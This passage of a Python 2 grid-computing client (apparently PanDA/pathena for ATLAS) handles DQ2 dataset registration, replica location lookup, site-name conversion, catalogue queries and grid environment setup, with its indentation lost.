sys.exit(EC_Failed)
retMap[guid] = guidLfnMap[guid]
# return
return retMap,allMap
# register dataset
def addDataset(name,verbose=False,location='',dsExist=False,allowProdDisk=False,dsCheck=True):
# generate DUID/VUID
duid = MiscUtils.wrappedUuidGen()
vuid = MiscUtils.wrappedUuidGen()
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
try:
errStr = ''
# add
if not dsExist:
url = baseURLDQ2SSL + '/ws_repository/rpc'
nTry = 3
for iTry in range(nTry):
data = {'operation':'addDataset','dsn': name,'duid': duid,'vuid':vuid,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen(),'update':'yes'}
status,out = curl.post(url,data,rucioAccount=True)
if not dsCheck and out != None and re.search('DQDatasetExistsException',out) != None:
dsExist = True
break
elif status != 0 or (out != None and re.search('Exception',out) != None):
if iTry+1 == nTry:
errStr = "ERROR : could not add dataset to DQ2 repository"
sys.exit(EC_Failed)
time.sleep(20)
else:
break
# get VUID
if dsExist:
# check location
tmpLocations = getLocations(name,[],'',False,verbose,getDQ2IDs=True)
if location in tmpLocations:
return
# get VUID
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByName','dsn':name,'version':0,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not get VUID from DQ2"
sys.exit(EC_Failed)
# parse
vuid = out[name]['vuids'][0]
# add replica
if re.search('SCRATCHDISK$',location) != None or re.search('USERDISK$',location) != None \
or re.search('LOCALGROUPDISK$',location) != None \
or (allowProdDisk and (re.search('PRODDISK$',location) != None or \
re.search('DATADISK$',location) != None)):
url = baseURLDQ2SSL + '/ws_location/rpc'
nTry = 3
for iTry in range(nTry):
data = {'operation':'addDatasetReplica','vuid':vuid,'site':location,
'complete':0,'transferState':1,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0 or out != 1:
if iTry+1 == nTry:
errStr = "ERROR : could not register location : %s" % location
sys.exit(EC_Failed)
time.sleep(20)
else:
break
else:
errStr = "ERROR : registration at %s is disallowed" % location
sys.exit(EC_Failed)
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# create dataset container
def createContainer(name,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
try:
errStr = ''
# add
url = baseURLDQ2SSL + '/ws_dq2/rpc'
nTry = 3
for iTry in range(nTry):
data = {'operation':'container_create','name': name,
'API':'030','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0 or (out != None and re.search('Exception',out) != None):
if iTry+1 == nTry:
errStr = "ERROR : could not create container in DQ2"
sys.exit(EC_Failed)
time.sleep(20)
else:
break
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# add datasets to container
def addDatasetsToContainer(name,datasets,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
try:
errStr = ''
# add
url = baseURLDQ2SSL + '/ws_dq2/rpc'
nTry = 3
for iTry in range(nTry):
data = {'operation':'container_register','name': name,
'datasets':datasets,'API':'030',
'tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0 or (out != None and re.search('Exception',out) != None):
if iTry+1 == nTry:
errStr = "ERROR : could not add DQ2 datasets to container"
sys.exit(EC_Failed)
time.sleep(20)
else:
break
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# get container elements
def getElementsFromContainer(name,verbose=False):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
try:
errStr = ''
# get elements
url = baseURLDQ2 + '/ws_dq2/rpc'
data = {'operation':'container_retrieve','name': name,
'API':'030','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0 or (isinstance(out,types.StringType) and re.search('Exception',out) != None):
errStr = "ERROR : could not get container %s from DQ2" % name
sys.exit(EC_Failed)
return out
except:
print status,out
type, value, traceBack = sys.exc_info()
print "%s %s" % (type,value)
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
# convert srmv2 site to srmv1 site ID
def convSrmV2ID(tmpSite):
# keep original name to avoid double conversion
origSite = tmpSite
# doesn't convert FR/IT/UK sites
for tmpPrefix in ['IN2P3-','INFN-','UKI-','GRIF-','DESY-','UNI-','RU-',
'LIP-','RO-']:
if tmpSite.startswith(tmpPrefix):
tmpSite = re.sub('_[A-Z,0-9]+DISK$', 'DISK',tmpSite)
tmpSite = re.sub('_[A-Z,0-9]+TAPE$', 'DISK',tmpSite)
tmpSite = re.sub('_PHYS-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('_PERF-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('_DET-[A-Z,0-9]+$', 'DISK',tmpSite)
tmpSite = re.sub('_SOFT-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('_TRIG-DAQ$','DISK',tmpSite)
return tmpSite
# patch for CERN EOS
if tmpSite.startswith('CERN-PROD_EOS'):
return 'CERN-PROD_EOSDISK'
# patch for CERN TMP
if tmpSite.startswith('CERN-PROD_TMP'):
return 'CERN-PROD_TMPDISK'
# patch for CERN OLD
if tmpSite.startswith('CERN-PROD_OLD') or tmpSite.startswith('CERN-PROD_LOCAL'):
return 'CERN-PROD_OLDDISK'
# patch for SRM v2
tmpSite = re.sub('-[^-_]+_[A-Z,0-9]+DISK$', 'DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_[A-Z,0-9]+TAPE$', 'DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_PHYS-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_PERF-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_DET-[A-Z,0-9]+$', 'DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_SOFT-[A-Z,0-9]+$','DISK',tmpSite)
tmpSite = re.sub('-[^-_]+_TRIG-DAQ$','DISK',tmpSite)
# SHOULD BE REMOVED Once all sites and DQ2 migrate to srmv2
# patch for BNL
if tmpSite in ['BNLDISK','BNLTAPE']:
tmpSite = 'BNLPANDA'
# patch for LYON
if tmpSite in ['LYONDISK','LYONTAPE']:
tmpSite = 'IN2P3-CCDISK'
# patch for TAIWAN
if tmpSite.startswith('ASGC'):
tmpSite = 'TAIWANDISK'
# patch for CERN
if tmpSite.startswith('CERN'):
tmpSite = 'CERNDISK'
# patch for some special sites where automatic guessing is impossible
if tmpSite == 'UVIC':
tmpSite = 'VICTORIA'
# US T2s
if origSite == tmpSite:
tmpSite = re.sub('_[A-Z,0-9]+DISK$', '',tmpSite)
tmpSite = re.sub('_[A-Z,0-9]+TAPE$', '',tmpSite)
tmpSite = re.sub('_PHYS-[A-Z,0-9]+$','',tmpSite)
tmpSite = re.sub('_PERF-[A-Z,0-9]+$','',tmpSite)
tmpSite = re.sub('_DET-[A-Z,0-9]+$', '',tmpSite)
tmpSite = re.sub('_SOFT-[A-Z,0-9]+$','',tmpSite)
tmpSite = re.sub('_TRIG-DAQ$','',tmpSite)
if tmpSite == 'NET2':
tmpSite = 'BU'
if tmpSite == 'MWT2_UC':
tmpSite = 'MWT2'
# return
return tmpSite
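# Worked examples for convSrmV2ID, traced through the substitutions above:
#   'IN2P3-CC_SCRATCHDISK'  -> 'IN2P3-CCDISK'  (protected FR/IT/UK-style prefix)
#   'CERN-PROD_SCRATCHDISK' -> 'CERNDISK'      (generic SRMv2 rule + CERN patch)
#   'MWT2_UC_SCRATCHDISK'   -> 'MWT2'          (US T2 fallback + MWT2_UC patch)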
# check tape sites
def isTapeSite(origTmpSite):
if re.search('TAPE$',origTmpSite) != None or \
re.search('PROD_TZERO$',origTmpSite) != None or \
re.search('PROD_TMPDISK$',origTmpSite) != None or \
re.search('PROD_DAQ$',origTmpSite) != None:
return True
return False
# check online site
def isOnlineSite(origTmpSite):
# get PandaID
tmpPandaSite = convertDQ2toPandaID(origTmpSite)
# check if Panda site
if not PandaSites.has_key(tmpPandaSite):
return False
# exclude long,local queues
if isExcudedSite(tmpPandaSite):
return False
# status
if PandaSites[tmpPandaSite]['status'] == 'online':
return True
return False
# get locations
def getLocations(name,fileList,cloud,woFileCheck,verbose=False,expCloud=False,getReserved=False,
getTapeSites=False,getDQ2IDs=False,locCandidates=None,removeDS=False,
removedDatasets=[],useOutContainer=False,includeIncomplete=False,
notSiteStatusCheck=False,useCVMFS=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# get logger
tmpLog = PLogger.getPandaLogger()
try:
errStr = ''
names = name.split(',')
# loop over all names
retSites = []
retSiteMap = {}
resRetSiteMap = {}
resBadStSites = {}
resTapeSites = {}
retDQ2IDs = []
retDQ2IDmap = {}
allOut = {}
iLookUp = 0
resUsedDsMap = {}
global globalCompleteDsMap
# convert candidates for SRM v2
if locCandidates != None:
locCandidatesSrmV2 = []
for locTmp in locCandidates:
locCandidatesSrmV2.append(convSrmV2ID(locTmp))
# loop over all names
for tmpName in names:
# ignore removed datasets
if tmpName in removedDatasets:
continue
iLookUp += 1
if iLookUp % 20 == 0:
time.sleep(1)
# container
containerFlag = False
if tmpName.endswith('/'):
containerFlag = True
# get VUID
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByName','dsn':tmpName,'version':0,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0 or out == '\x00' or (not checkDatasetInMap(tmpName,out)):
errStr = "ERROR : could not find %s in DQ2 DB. Check if the dataset name is correct" \
% tmpName
if getReserved and getTapeSites:
sys.exit(EC_Failed)
if verbose:
print errStr
return retSites
# get real datasetname
tmpName = getDatasetValueInMap(tmpName,out)
# parse
duid = out[tmpName]['duid']
# get replica location
url = baseURLDQ2 + '/ws_location/rpc'
if containerFlag:
data = {'operation':'listContainerReplicas','cn':tmpName,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
else:
data = {'operation':'listDatasetReplicas','duid':duid,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not query location for %s" % tmpName
sys.exit(EC_Failed)
# convert container format to dataset format
outTmp = {}
if containerFlag:
# count number of complete elements
for tmpEleName,tmpEleVal in out.iteritems():
# ignore removed datasets
if tmpEleName in removedDatasets:
continue
for tmpEleVUID,tmpEleLocs in tmpEleVal.iteritems():
# get complete locations
tmpFoundFlag = False
for tmpEleLoc in tmpEleLocs[1]:
# don't use TAPE
if isTapeSite(tmpEleLoc):
if not resTapeSites.has_key(tmpEleLoc):
resTapeSites[tmpEleLoc] = []
if not tmpEleName in resTapeSites[tmpEleLoc]:
resTapeSites[tmpEleLoc].append(tmpEleName)
continue
# append
if not outTmp.has_key(tmpEleLoc):
outTmp[tmpEleLoc] = [{'found':0,'useddatasets':[]}]
# increment
outTmp[tmpEleLoc][0]['found'] += 1
# append list
if not tmpEleName in outTmp[tmpEleLoc][0]['useddatasets']:
outTmp[tmpEleLoc][0]['useddatasets'].append(tmpEleName)
# found online site
if isOnlineSite(tmpEleLoc):
tmpFoundFlag = True
# add to global map
if not globalCompleteDsMap.has_key(tmpEleName):
globalCompleteDsMap[tmpEleName] = []
globalCompleteDsMap[tmpEleName].append(tmpEleLoc)
# use incomplete locations if no complete replica at online sites
if includeIncomplete or not tmpFoundFlag:
for tmpEleLoc in tmpEleLocs[0]:
# don't use TAPE
if isTapeSite(tmpEleLoc):
if not resTapeSites.has_key(tmpEleLoc):
resTapeSites[tmpEleLoc] = []
if not tmpEleName in resTapeSites[tmpEleLoc]:
resTapeSites[tmpEleLoc].append(tmpEleName)
continue
# append
if not outTmp.has_key(tmpEleLoc):
outTmp[tmpEleLoc] = [{'found':0,'useddatasets':[]}]
# increment
outTmp[tmpEleLoc][0]['found'] += 1
# append list
if not tmpEleName in outTmp[tmpEleLoc][0]['useddatasets']:
outTmp[tmpEleLoc][0]['useddatasets'].append(tmpEleName)
else:
# check completeness
tmpIncompList = []
tmpFoundFlag = False
for tmpOutKey,tmpOutVar in out.iteritems():
# don't use TAPE
if isTapeSite(tmpOutKey):
if not resTapeSites.has_key(tmpOutKey):
resTapeSites[tmpOutKey] = []
if not tmpName in resTapeSites[tmpOutKey]:
resTapeSites[tmpOutKey].append(tmpName)
continue
# protection against unchecked replicas ('found' may not be an integer)
tmpNfound = tmpOutVar[0]['found']
# complete or not
if isinstance(tmpNfound,types.IntType) and tmpNfound == tmpOutVar[0]['total']:
outTmp[tmpOutKey] = [{'found':1,'useddatasets':[tmpName]}]
# found online site
if isOnlineSite(tmpOutKey):
tmpFoundFlag = True
# add to global map
if not globalCompleteDsMap.has_key(tmpName):
globalCompleteDsMap[tmpName] = []
globalCompleteDsMap[tmpName].append(tmpOutKey)
else:
# keep just in case
if not tmpOutKey in tmpIncompList:
tmpIncompList.append(tmpOutKey)
# use incomplete replicas when no complete at online sites
if includeIncomplete or not tmpFoundFlag:
for tmpOutKey in tmpIncompList:
outTmp[tmpOutKey] = [{'found':1,'useddatasets':[tmpName]}]
# replace
out = outTmp
# sum
for tmpOutKey,tmpOutVar in out.iteritems():
if not allOut.has_key(tmpOutKey):
allOut[tmpOutKey] = [{'found':0,'useddatasets':[]}]
allOut[tmpOutKey][0]['found'] += tmpOutVar[0]['found']
allOut[tmpOutKey][0]['useddatasets'] += tmpOutVar[0]['useddatasets']
# replace
out = allOut
if verbose:
print out
# choose sites where most files are available
if not woFileCheck:
tmpMaxFiles = -1
for origTmpSite,origTmpInfo in out.iteritems():
# get PandaID
tmpPandaSite = convertDQ2toPandaID(origTmpSite)
# check status
if PandaSites.has_key(tmpPandaSite) and (notSiteStatusCheck or PandaSites[tmpPandaSite]['status'] == 'online'):
# don't use TAPE
if isTapeSite(origTmpSite):
if not resTapeSites.has_key(origTmpSite):
if origTmpInfo[0].has_key('useddatasets'):
resTapeSites[origTmpSite] = origTmpInfo[0]['useddatasets']
else:
resTapeSites[origTmpSite] = names
continue
# check the number of available files
if tmpMaxFiles < origTmpInfo[0]['found']:
tmpMaxFiles = origTmpInfo[0]['found']
# remove sites
for origTmpSite in out.keys():
if out[origTmpSite][0]['found'] < tmpMaxFiles:
# use sites where most files are available if output container is not used
if not useOutContainer:
del out[origTmpSite]
if verbose:
print out
tmpFirstDump = True
for origTmpSite,origTmpInfo in out.iteritems():
# don't use TAPE
if isTapeSite(origTmpSite):
if not resTapeSites.has_key(origTmpSite):
resTapeSites[origTmpSite] = origTmpInfo[0]['useddatasets']
continue
# collect DQ2 IDs
if not origTmpSite in retDQ2IDs:
retDQ2IDs.append(origTmpSite)
for tmpUDS in origTmpInfo[0]['useddatasets']:
if not retDQ2IDmap.has_key(tmpUDS):
retDQ2IDmap[tmpUDS] = []
if not origTmpSite in retDQ2IDmap[tmpUDS]:
retDQ2IDmap[tmpUDS].append(origTmpSite)
# patch for SRM v2
tmpSite = convSrmV2ID(origTmpSite)
# if candidates are limited
if locCandidates != None and (not tmpSite in locCandidatesSrmV2):
continue
if verbose:
tmpLog.debug('%s : %s->%s' % (tmpName,origTmpSite,tmpSite))
# check cloud, DQ2 ID and status
tmpSiteBeforeLoop = tmpSite
for tmpID,tmpSpec in PandaSites.iteritems():
# reset
tmpSite = tmpSiteBeforeLoop
# get list of DQ2 IDs
srmv2ddmList = []
for tmpDdmID in tmpSpec['setokens'].values():
srmv2ddmList.append(convSrmV2ID(tmpDdmID))
# dump
if tmpFirstDump:
if verbose:
pass
if tmpSite in srmv2ddmList or convSrmV2ID(tmpSpec['ddm']).startswith(tmpSite) \
or (useCVMFS and tmpSpec['iscvmfs'] == True):
# overwrite tmpSite for srmv1
tmpSite = convSrmV2ID(tmpSpec['ddm'])
# exclude long,xrootd,local queues
if isExcudedSite(tmpID):
continue
if not tmpSite in retSites:
retSites.append(tmpSite)
# just collect locations when file check is disabled
if woFileCheck:
break
# append site
if tmpSpec['status'] == 'online' or notSiteStatusCheck:
# return sites in a cloud when it is specified or all sites
if tmpSpec['cloud'] == cloud or (not expCloud):
appendMap = retSiteMap
else:
appendMap = resRetSiteMap
# mapping between location and Panda siteID
if not appendMap.has_key(tmpSite):
appendMap[tmpSite] = []
if not tmpID in appendMap[tmpSite]:
appendMap[tmpSite].append(tmpID)
if origTmpInfo[0].has_key('useddatasets'):
if not tmpID in resUsedDsMap:
resUsedDsMap[tmpID] = []
resUsedDsMap[tmpID] += origTmpInfo[0]['useddatasets']
else:
# not interested in another cloud
if tmpSpec['cloud'] != cloud and expCloud:
continue
# keep bad status sites for info
if not resBadStSites.has_key(tmpSpec['status']):
resBadStSites[tmpSpec['status']] = []
if not tmpID in resBadStSites[tmpSpec['status']]:
resBadStSites[tmpSpec['status']].append(tmpID)
tmpFirstDump = False
# return DQ2 IDs
if getDQ2IDs:
if includeIncomplete:
return retDQ2IDmap,resUsedDsMap
return retDQ2IDs
# return list when file check is not required
if woFileCheck:
return retSites
# use reserved map when the cloud doesn't hold the dataset
if retSiteMap == {} and (not expCloud) and (not getReserved):
retSiteMap = resRetSiteMap
# reset reserved map for expCloud
if getReserved and expCloud:
resRetSiteMap = {}
# return map
if verbose:
if not getReserved:
tmpLog.debug("getLocations -> %s" % retSiteMap)
else:
tmpLog.debug("getLocations pri -> %s" % retSiteMap)
tmpLog.debug("getLocations sec -> %s" % resRetSiteMap)
# print bad status sites for info
if retSiteMap == {} and resRetSiteMap == {} and resBadStSites != {}:
msgFirstFlag = True
for tmpStatus,tmpSites in resBadStSites.iteritems():
# ignore panda-specific site status
if tmpStatus.startswith('panda_'):
continue
if msgFirstFlag:
tmpLog.warning("the following sites hold %s but they are not online" % name)
msgFirstFlag = False
print " status=%s : %s" % (tmpStatus,tmpSites)
if not getReserved:
return retSiteMap
elif not getTapeSites:
return retSiteMap,resRetSiteMap
elif not removeDS:
return retSiteMap,resRetSiteMap,resTapeSites
else:
return retSiteMap,resRetSiteMap,resTapeSites,resUsedDsMap
except:
print status,out
if errStr != '':
print errStr
else:
type, value, traceBack = sys.exc_info()
print "ERROR : invalid DQ2 response - %s %s" % (type,value)
sys.exit(EC_Failed)
#@ Returns number of events per file in a given dataset
#SP 2006
#
def nEvents(name, verbose=False, askServer=True, fileList = {}, scanDir = '.', askUser=True):
# @ These declarations can be moved to the configuration section at the very beginning
# Here just for code clarity
#
# Parts of the query
str1="/?dset="
str2="&get=evperfile"
# Form full query string
m_query = baseURLMON+str1+name+str2
manualEnter = True
# Send query get number of events per file
if askServer:
nEvents=urllib.urlopen(m_query).read()
if verbose:
print m_query
print nEvents
if re.search('HTML',nEvents) == None and nEvents != '-1':
manualEnter = False
else:
# use ROOT to get # of events
try:
import ROOT
rootFile = ROOT.TFile("%s/%s" % (scanDir,fileList[0]))
tree = ROOT.gDirectory.Get( 'CollectionTree' )
nEvents = tree.GetEntriesFast()
# disable
if nEvents > 0:
manualEnter = False
except:
if verbose:
type, value, traceBack = sys.exc_info()
print "ERROR : could not get nEvents with ROOT - %s %s" % (type,value)
# In case of error the PANDAMON server returns a full HTML page
# while normally it returns an integer
if manualEnter:
if askUser:
if askServer:
print "Could not get the # of events from MetaDB for %s " % name
while True:
str = raw_input("Enter the number of events per file (or set --nEventsPerFile) : ")
try:
nEvents = int(str)
break
except:
pass
else:
print "ERROR : Could not get the # of events from MetaDB for %s " % name
sys.exit(EC_Failed)
if verbose:
print "Dataset %s has %s evetns per file" % (name,nEvents)
return int(nEvents)
# get PFN from LRC
def _getPFNsLRC(lfns,dq2url,verbose):
pfnMap = {}
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# get PoolFileCatalog
iLFN = 0
strLFNs = ''
url = dq2url + 'lrc/PoolFileCatalog'
firstError = True
# check if GUID lookup is supported
useGUID = True
status,out = curl.get(url,{'guids':'test'})
if status ==0 and out == 'Must GET or POST a list of LFNs!':
useGUID = False
for lfn,vals in lfns.iteritems():
iLFN += 1
# make argument
if useGUID:
strLFNs += '%s ' % vals['guid']
else:
strLFNs += '%s ' % lfn
if iLFN % 40 == 0 or iLFN == len(lfns):
# get PoolFileCatalog
strLFNs = strLFNs.rstrip()
if useGUID:
data = {'guids':strLFNs}
else:
data = {'lfns':strLFNs}
# avoid too long argument
strLFNs = ''
# execute
status,out = curl.get(url,data)
time.sleep(2)
if out.startswith('Error'):
# LFN not found
continue
if status != 0 or (not out.startswith('<?xml')):
if firstError:
print status,out
print "ERROR : LRC %s returned invalid response" % dq2url
firstError = False
continue
# parse
try:
root = xml.dom.minidom.parseString(out)
files = root.getElementsByTagName('File')
for file in files:
# get PFN and LFN nodes
physical = file.getElementsByTagName('physical')[0]
pfnNode = physical.getElementsByTagName('pfn')[0]
logical = file.getElementsByTagName('logical')[0]
lfnNode = logical.getElementsByTagName('lfn')[0]
# convert UTF8 to Raw
pfn = str(pfnNode.getAttribute('name'))
lfn = str(lfnNode.getAttribute('name'))
# remove /srm/managerv1?SFN=
pfn = re.sub('/srm/managerv1\?SFN=','',pfn)
# append
pfnMap[lfn] = pfn
except:
print status,out
type, value, traceBack = sys.exc_info()
print "ERROR : could not parse XML - %s %s" % (type, value)
sys.exit(EC_Failed)
# return
return pfnMap
# get list of missing LFNs from LRC
def getMissLFNsFromLRC(files,url,verbose=False,nFiles=0):
# get PFNs
pfnMap = _getPFNsLRC(files,url,verbose)
# check Files
missFiles = []
for file in files:
if not file in pfnMap.keys():
missFiles.append(file)
return missFiles
# get PFN list from LFC
def _getPFNsLFC(fileMap,site,explicitSE,verbose=False,nFiles=0):
pfnMap = {}
for path in sys.path:
# look for base package
basePackage = __name__.split('.')[-2]
if os.path.exists(path) and os.path.isdir(path) and basePackage in os.listdir(path):
lfcClient = '%s/%s/LFCclient.py' % (path,basePackage)
if explicitSE:
stList = getSE(site)
else:
stList = []
lfcHost = getLFC(site)
inFile = '%s_in' % MiscUtils.wrappedUuidGen()
outFile = '%s_out' % MiscUtils.wrappedUuidGen()
# write GUID/LFN
ifile = open(inFile,'w')
fileKeys = fileMap.keys()
fileKeys.sort()
for lfn in fileKeys:
vals = fileMap[lfn]
ifile.write('%s %s\n' % (vals['guid'],lfn))
ifile.close()
# construct command
gridSrc = _getGridSrc()
com = '%s python -Wignore %s -l %s -i %s -o %s -n %s' % (gridSrc,lfcClient,lfcHost,inFile,outFile,nFiles)
for index,stItem in enumerate(stList):
if index != 0:
com += ',%s' % stItem
else:
com += ' -s %s' % stItem
if verbose:
com += ' -v'
print com
# execute
status = os.system(com)
if status == 0:
ofile = open(outFile)
line = ofile.readline()
line = re.sub('\n','',line)
exec 'pfnMap = %s' % line
ofile.close()
# remove tmp files
try:
os.remove(inFile)
os.remove(outFile)
except:
pass
# failed
if status != 0:
print "ERROR : failed to access LFC %s" % lfcHost
return {}
break
# return
return pfnMap
# get list of missing LFNs from LFC
def getMissLFNsFromLFC(fileMap,site,explicitSE,verbose=False,nFiles=0,shadowList=[],dsStr='',removedDS=[],
skipScan=False):
# get logger
tmpLog = PLogger.getPandaLogger()
missList = []
# ignore files in shadow
if shadowList != []:
tmpFileMap = {}
for lfn,vals in fileMap.iteritems():
if not lfn in shadowList:
tmpFileMap[lfn] = vals
else:
tmpFileMap = fileMap
# ignore expiring files; initialize defaults for the case where dsStr is empty
expOkFilesList = []
expCompInDQ2FilesList = []
if dsStr != '':
tmpTmpFileMap = {}
expFilesMap,expOkFilesList,expCompInDQ2FilesList = getExpiringFiles(dsStr,removedDS,site,verbose,getOKfiles=True)
# collect files in incomplete replicas
for lfn,vals in tmpFileMap.iteritems():
if lfn in expOkFilesList and not lfn in expCompInDQ2FilesList:
tmpTmpFileMap[lfn] = vals
tmpFileMap = tmpTmpFileMap
# with skipScan, only complete replicas are used
if skipScan and expCompInDQ2FilesList == []:
tmpLog.info("%s may hold %s files at most in incomplete replicas but they are not used when --skipScan is set" % \
(site,len(expOkFilesList)))
# get PFNS
if tmpFileMap != {} and not skipScan:
tmpLog.info("scanning LFC %s for files in incompete datasets at %s" % (getLFC(site),site))
pfnMap = _getPFNsLFC(tmpFileMap,site,explicitSE,verbose,nFiles)
else:
pfnMap = {}
for lfn,vals in fileMap.iteritems():
if (not vals['guid'] in pfnMap.keys()) and (not lfn in shadowList) \
and not lfn in expCompInDQ2FilesList:
missList.append(lfn)
# return
return missList
# get grid source file
def _getGridSrc():
# set Grid setup.sh if needed
status,out = commands.getstatusoutput('voms-proxy-info --version')
athenaStatus,athenaPath = commands.getstatusoutput('which athena.py')
if status == 0:
gridSrc = ''
if athenaStatus == 0 and athenaPath.startswith('/afs/in2p3.fr'):
# for LYON, to avoid missing LD_LIBRARY_PATH
gridSrc = '/afs/in2p3.fr/grid/profiles/lcg_env.sh'
elif athenaStatus == 0 and re.search('^/afs/\.*cern.ch',athenaPath) != None:
# for CERN, VDT is already installed
gridSrc = '/dev/null'
else:
# set Grid setup.sh
if os.environ.has_key('PATHENA_GRID_SETUP_SH'):
gridSrc = os.environ['PATHENA_GRID_SETUP_SH']
else:
if not os.environ.has_key('CMTSITE'):
os.environ['CMTSITE'] = ''
if os.environ['CMTSITE'] == 'CERN' or (athenaStatus == 0 and \
re.search('^/afs/\.*cern.ch',athenaPath) != None):
gridSrc = '/dev/null'
elif os.environ['CMTSITE'] == 'BNL':
gridSrc = '/afs/usatlas.bnl.gov/osg/client/@sys/current/setup.sh'
else:
# try to determine the site using the path to athena
if athenaStatus == 0 and athenaPath.startswith('/afs/in2p3.fr'):
# LYON
gridSrc = '/afs/in2p3.fr/grid/profiles/lcg_env.sh'
elif athenaStatus == 0 and athenaPath.startswith('/cvmfs/atlas.cern.ch'):
# CVMFS
if not os.environ.has_key('ATLAS_LOCAL_ROOT_BASE'):
os.environ['ATLAS_LOCAL_ROOT_BASE'] = '/cvmfs/atlas.cern.ch/repo/ATLASLocalRootBase'
gridSrc = os.environ['ATLAS_LOCAL_ROOT_BASE'] + '/user/pandaGridSetup.sh'
else:
print "ERROR : PATHENA_GRID_SETUP_SH is not defined in envvars"
print " for CERN on SLC6 : export PATHENA_GRID_SETUP_SH=/dev/null"
print " for CERN on SLC5 : export PATHENA_GRID_SETUP_SH=/afs/cern.ch/project/gd/LCG-share/current_3.2/etc/profile.d/grid_env.sh"
print " for LYON : export PATHENA_GRID_SETUP_SH=/afs/in2p3.fr/grid/profiles/lcg_env.sh"
print " for BNL : export PATHENA_GRID_SETUP_SH=/afs/usatlas.bnl.gov/osg/client/@sys/current/setup.sh"
return False
# check grid-proxy
if gridSrc != '':
gridSrc = 'source %s > /dev/null;' % gridSrc
# some grid_env.sh don't set PATH/LD_LIBRARY_PATH correctly
gridSrc = "unset LD_LIBRARY_PATH; unset PYTHONPATH; unset MANPATH; export PATH=/usr/local/bin:/bin:/usr/bin; %s" % gridSrc
# return
return gridSrc
# get DN
def getDN(origString):
shortName = ''
distinguishedName = ''
for line in origString.split('/'):
if line.startswith('CN='):
distinguishedName = re.sub('^CN=','',line)
distinguishedName = re.sub('\d+$','',distinguishedName)
distinguishedName = re.sub('\.','',distinguishedName)
distinguishedName = distinguishedName.strip()
if re.search(' ',distinguishedName) != None:
# look for full name
distinguishedName = distinguishedName.replace(' ','')
break
elif shortName == '':
# keep short name
shortName = distinguishedName
distinguishedName = ''
# use short name
if distinguishedName == '':
distinguishedName = shortName
# return
return distinguishedName
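# Worked example for getDN (the DN is hypothetical):
#   getDN('/DC=ch/DC=cern/OU=Users/CN=John Doe 12345')
# strips the CN= prefix and the trailing digits, then removes the blanks in
# the full name, giving 'JohnDoe'; a short nickname CN is kept as a fallback.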
from HTMLParser import HTMLParser
class _monHTMLParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.map = {}
self.switch = False
self.td = False
def getMap(self):
retMap = {}
if len(self.map) > 1:
names = self.map[0]
vals = self.map[1]
# values
try:
retMap['total'] = int(vals[names.index('Jobs')])
except:
retMap['total'] = 0
try:
retMap['finished'] = int(vals[names.index('Finished')])
except:
retMap['finished'] = 0
try:
retMap['failed'] = int(vals[names.index('Failed')])
except:
retMap['failed'] = 0
retMap['running'] = retMap['total'] - retMap['finished'] - \
retMap['failed']
return retMap
def handle_data(self, data):
if self.switch:
if self.td:
self.td = False
self.map[len(self.map)-1].append(data)
else:
self.map[len(self.map)-1][-1] += data
else:
if data == "Job Sets:":
self.switch = True
def handle_starttag(self, tag, attrs):
if self.switch and tag == 'tr':
self.map[len(self.map)] = []
if self.switch and tag == 'td':
self.td = True
def handle_endtag(self, tag):
if self.switch and self.td:
self.map[len(self.map)-1].append("")
self.td = False
# get jobInfo from Mon
def getJobStatusFromMon(id,verbose=False):
# get name
shortName = ''
distinguishedName = ''
for line in commands.getoutput('%s grid-proxy-info -identity' % _getGridSrc()).split('/'):
if line.startswith('CN='):
distinguishedName = re.sub('^CN=','',line)
distinguishedName = re.sub('\d+$','',distinguishedName)
distinguishedName = distinguishedName.strip()
if re.search(' ',distinguishedName) != None:
# look for full name
break
elif shortName == '':
# keep short name
shortName = distinguishedName
distinguishedName = ''
# use short name
if distinguishedName == '':
distinguishedName = shortName
# instantiate curl
curl = _Curl()
curl.verbose = verbose
data = {'job':'*',
'jobDefinitionID' : id,
'user' : distinguishedName,
'days' : 100}
# execute
status,out = curl.get(baseURLMON,data)
